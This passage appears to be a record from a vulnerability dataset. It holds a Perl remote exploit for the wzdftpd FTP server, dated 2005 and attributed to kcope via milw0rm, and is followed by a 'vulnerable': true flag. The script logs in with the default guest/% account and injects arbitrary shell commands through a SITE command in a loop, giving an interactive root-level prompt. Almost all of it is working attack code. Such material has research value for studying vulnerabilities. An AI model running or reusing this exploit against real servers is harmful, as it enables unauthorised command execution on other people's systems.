remote_host remote_port user pass custom_site_command\\n\"\n\n\t     .\"default guest account for wzdftpd is username/password: guest/%\\n\";\n\n}\n\n\n\nprint \"\n\nwzdftpd remote exploit by kcope\n\nAugust 2005\n\nconfidential! keep private!\n\n\n\n\";\n\n\n\nif ($#ARGV < 4) {\n\n\tusage();\n\n\texit();\t \n\n}\n\n\n\n$host = $ARGV[0];\n\n$port = $ARGV[1];\n\n$user = $ARGV[2];\n\n$pass = $ARGV[3];\n\n$sitecmd = $ARGV[4];\n\n\n\n$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)\n\n     or die \"Cannot connect to $host: $@\";\n\n\n\n$ftp->login($user, $pass)\n\n     or die \"Cannot login \", $ftp->message;\n\n     \n\nprint \"Now you can type commands, hopefully as r00t!\\n\";\n\nwhile(1) {\n\n\tprint \"!\\$%&#>\";\n\n\t$cmd=<stdin>;\n\n\t$ftp->site($sitecmd, \"|$cmd;\");\n\n\tprint $ftp->message();\n\n}\n\n\n\n# milw0rm.com [2005-09-24]",
1200        "vulnerable": true

Showing the first 1,200 of 5342 lines. Download the file for the rest.